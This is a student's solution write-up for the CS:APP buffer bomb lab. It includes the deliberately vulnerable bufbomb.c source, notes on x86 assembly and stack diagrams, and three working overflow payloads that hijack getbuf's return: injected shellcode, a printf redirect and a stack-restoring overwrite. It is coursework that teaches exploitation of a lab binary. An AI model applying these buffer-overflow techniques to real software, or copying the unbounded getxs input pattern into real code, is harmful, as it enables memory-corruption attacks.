CS:APP Buffer Bomb Lab

solution

I used the TDM-GCC 4.9.2 32-bit Debug compiler in Dev-C++. Newer compiler versions add security hardening that I could not get around, so I gave up on them and stayed with this version.

Thought Process Analysis:

One-Sentence Summary:

Assembly knowledge is inescapable—you'll never get away from it in your lifetime.

Tools Needed:

Dev-C++ / Visual Studio
OllyDbg (or the special edition provided by the 52pojie community)

Source Code:

/* bufbomb.c
 *
 * Bomb program that is solved using a buffer overflow attack
 *
 * program for CS:APP problem 3.38
 *
 * used for CS 202 HW 8 part 2
 *
 * compile using
 *   gcc -g -O2 -Os -o bufbomb bufbomb.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

/* Like gets, except that characters are typed as pairs of hex digits.
   Nondigit characters are ignored.  Stops when encounters newline */
char *getxs(char *dest)
{
  int c;
  int even = 1; /* Have read even number of digits */
  int otherd = 0; /* Other hex digit of pair */
  char *sp = dest;
  while ((c = getchar()) != EOF && c != '\n') {
    if (isxdigit(c)) {
      int val;
      if ('0' <= c && c <= '9')
	val = c - '0';
      else if ('A' <= c && c <= 'F')
	val = c - 'A' + 10;
      else
	val = c - 'a' + 10;
      if (even) {
	otherd = val;
	even = 0;
      } else {
	*sp++ = otherd * 16 + val;
	even = 1;
      }
    }
  }
  *sp++ = '\0';
  return dest;
}

int getbuf()
{
  char buf[16];
  getxs(buf);
  return 1;
}

void test()
{
  int val;
  printf("Type Hex string:");
  val = getbuf();
  printf("getbuf returned 0x%x\n", val);
}

int main()
{
  int buf[16];
  /* This little hack is an attempt to get the stack to be in a
     stable position
  */
  int offset = (((int) buf) & 0xFFF);   
  int *space = (int *) malloc(offset);  
  *space = 0; /* So that don't get complaint of unused variable */
  test();
  return 0;
}

Compared to the previous challenge, the code in this one is much more beginner-friendly. Even the seemingly long getxs function simply reads pairs of hexadecimal digits from the input, converts each pair into one byte, and stores the bytes in the buf buffer.

But what does this have to do with the return value of getbuf, which is hard-coded to 1? I suddenly realized that getxs puts no limit on the input length, so it can write past the end of buf: this is a straightforward buffer overflow.

However, during the Qiangwang Cup competition, I had just copy-pasted the Python exploit code without understanding the principle of overflow at all. That's when I began a long journey of learning.

Prerequisite Knowledge 1 — Assembly

Registers

eax, ebx, ecx, edx: General-purpose registers. They act as temporary storage for variables and can also be used for addressing.
esp: Stack pointer (points to the top of the stack).
ebp: Base pointer (points to the base of the current stack frame).
eip: Instruction pointer (stores the address of the next instruction to execute; conceptually, the "line number" in code).

Instructions (Intel syntax as example)

mov: Copy instruction — assigns the value of the second operand to the first.
add: Adds the second operand to the first (similarly, sub = subtract, mul = multiply).
push: Decreases esp by the size of the operand, then stores the value at the new top of the stack.
pop: Loads the value at the top of the stack into a register, then increases esp by the size of the operand.
lea: Computes the address of the second operand and stores it in the first, without reading memory.
ptr: Operand-size specifier, as in dword ptr [ebp-0xC]; it says how many bytes the memory operand covers.
ss: Refers to the stack segment register. The classic segment registers are:
- cs: Code segment
- ds: Data segment
- ss: Stack segment
- es: Extra segment

(32-bit x86 also has fs and gs.) A prefix such as ss: in front of a memory operand states which segment the address belongs to.

For more details, see: Assembly Language Programming

Prerequisite Knowledge 2 — Stack Diagrams

Note: The stack is not an independent region. It is actually a part of memory that exists while the program is running! This means you can locate stack data directly in the memory window.

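The stack grows downward: the base is at a higher address and the top at a lower address. The bytes we input, however, are written into buf from low addresses to high addresses, which is why a long input eventually reaches the saved ebp and the return address above buf. Separately, x86 is little-endian, so a multi-byte value such as an address is stored with its least significant byte first.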

A stack diagram should include the current state (instruction), the contents of the stack, and the positions of the esp and ebp pointers. Ideally, use different colors to highlight how various operations affect the stack, making program flow clearer.

Drawing stack diagrams while analyzing assembly is a very good habit.

For more details, see: Stack Diagram 1 (Note: I checked the link—it's still alive and accessible.)

Solution

After a week of long study, I finally gained the ability to solve this problem.

Similar to ret2shellcode, we exploit the buffer overflow in getbuf. The goal is to overwrite getbuf's return address with the address of buf, which holds our input. That way, when getbuf returns, the CPU jumps to the start of buf and executes the machine code we placed there. That code then hands control back to test, which prints the desired output.

Payload layout: (code that sets eax = 0xdeadbeef) + (code that returns to test) + 00 padding + saved ebp + start address of buf

Locating the Function Address

First, use Dev-C++ to debug the source file. Set a breakpoint at the getbuf function, press F5 to start debugging, then check the CPU window—what you see is the assembly code. On my machine, the starting address of this function was 0x4015c1. This is the entry point of the getbuf function.

Next, open the program in OllyDbg, press Ctrl+G to jump to this address, and the preparation work is done.

Analyzing the Assembly Code — updated on 1/17/2022

Update (1/17/2022): The way the stack diagram was drawn before was not very standard. Stack diagrams should follow the principle of higher addresses on top, lower addresses at the bottom.

We can see that the getbuf function occupies memory addresses from 0x4015c1 to 0x4015d8. Let's combine this with the stack diagram to understand what's happening:

4015c1: Push the caller's base pointer (ebp) onto the stack (esp -= 4). This saves the pre-call state.
4015c2: Set ebp = esp. Both pointers now point to the same slot.
4015c4: esp -= 40, reserving space for local data.
4015c7: eax = ebp - 24, the address of buf where the string will be written.
4015ca: Place eax at the top of the stack as the argument to getxs. (The instruction is 3 bytes long, which suggests a store to [esp] rather than a one-byte push, so esp stays put.)
4015cd: Call getxs, which writes the decoded bytes starting at the address in eax.
4015d2: eax = 1, the normal return value.
4015d7: leave (equivalent to mov esp, ebp followed by pop ebp), restoring the pre-call state.
4015d8: ret (equivalent to pop eip).

(Since the stack has already overflowed and program logic is altered, further drawing has little meaning here.)

Writing the Exploit (exp)

(You can think of this as manually writing simple assembly.)

Instructions to Execute

Since a function's return value is passed back in eax, we need to modify eax. The instruction is:

mov eax,0xdeadbeef

Next, we must jump out of the getbuf function. To do this, we need to know the return address of getbuf. Debugging the test function in Dev-C++ shows its starting address as 0x4015d9. Looking at the assembly code, at 0x4015eb the function calls 0x4015c1 (getbuf), so the proper return address is the next line: 0x4015f0.

Since retn pops the value at the top of the stack into eip as the return address, we push the desired return address and then return:

push 0x4015f0
retn

Every assembly instruction is a shorthand for its machine code. We must translate them into hex. You can use gcc or simply check in OllyDbg—the second column shows the machine code.

The result is:

b8 ef be ad de 68 f0 15 40 00 c3

Redirecting Control Flow

The second step is to hijack the normal return sequence and redirect it to our crafted code.

On the stack, the slot that ebp points to holds the saved ebp, i.e. the base address of the test function's stack frame. This value must be preserved; otherwise the program will crash.

(The reason is that leave performs a pop ebp just before the return, and test keeps using ebp afterwards, so the popped value must match the original. If you've watched the Bilibili video, it becomes clearer.)

Immediately after this base address, we fill in the starting address of the injected string. That way, when retn executes, it pops our crafted address into eip and jumps there.

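From the stack diagram, the saved ebp is 0x62fe38, and the new return address (the value that ends up in eip) should be the address loaded into eax at 0x4015c7, i.e. the start of buf: 0x62fdf0.

So we append both values in little-endian byte order: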

38 fe 62 00 f0 fd 62 00

Determining the Length

The buffer starts at 0x62fdf0—this is easy to confirm.

Some might assume that since buf has length 16 and our code is 11 bytes, padding with 5 bytes of 00 is enough. That is wrong: the compiler places buf 24 bytes below ebp, not 16, so there is extra space between the end of buf and the saved ebp. This is the same reason why, in OI (Olympiad in Informatics), an array overrun that you would expect to give RE can end up as WA instead. Likewise, the 40 subtracted from esp is not the payload length.

The correct length is the distance from the start of buf to ebp, plus the two values stored above it. Debugging to 0x4015ca (the 5th diagram), we see ebp = 0x62fe08.

The saved ebp and the return address follow (4 bytes each), so the length is:

0x62fe08 - 0x62fdf0 + 8 = 32

Thus, we must fill:

32 - 8 - 11 = 13 bytes of 00

Final Answer

Combining everything, the final payload is:

b8 ef be ad de 68 f0 15 40 00 c3 
00 00 00 00 00 00 00 00 00 00 00 00 00 
38 fe 62 00 f0 fd 62 00

We successfully altered the program's control flow without causing errors.

Summary

System-level programming is truly no easy task—I'm starting to worry about my hairline.

~~The third security project—never (or never again) see you.~~

Here I am: officially still a high school senior, taking freshman-level courses, studying sophomore-level material, while tackling assignments from what used to be junior year. Sichuan University really is impressive—the course difficulty can match that of the C9 universities!

(Updated on 12/12)

(A relatively common and mainstream method, similar to ret2libc.)

A senior's alternative idea is: filler + saved ebp + address of the call to printf inside test + address of the format string + deadbeef

This approach is simpler because no injected code has to run, but you must know how printf receives its arguments here: they are read from the stack, with the address of the format string first and the value to print right after it.

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
CC CC CC CC CC CC CC CC 
38 FE 62 00 01 16 40 00 11 40 40 00 EF BE AD DE

(Updated on 12/28)

In the programming class, the teacher's idea was: dump the memory between the input address (buf) and the address of val inside the test function, and feed those bytes back as input so that everything in between keeps its original value. Then change only two things: set getbuf's return address to 0x4015f3, which skips the instruction that stores eax into [ebp - 0xC] (where val lives), and set the bytes at val's address to 0xdeadbeef.

Thus, the answer is:

DC FD 62 00 1C 43 B2 76 CC FF 62 00 C0 CC AC 76 
5C 0F ED 6A FE FF FF FF 
38 FE 62 00 F3 15 40 00 00 40 40 00 A4 68 3E 1C 
38 FE 62 00 10 76 AB 76 00 00 71 00 00 00 00 00 
58 0E 00 00 EF BE AD DE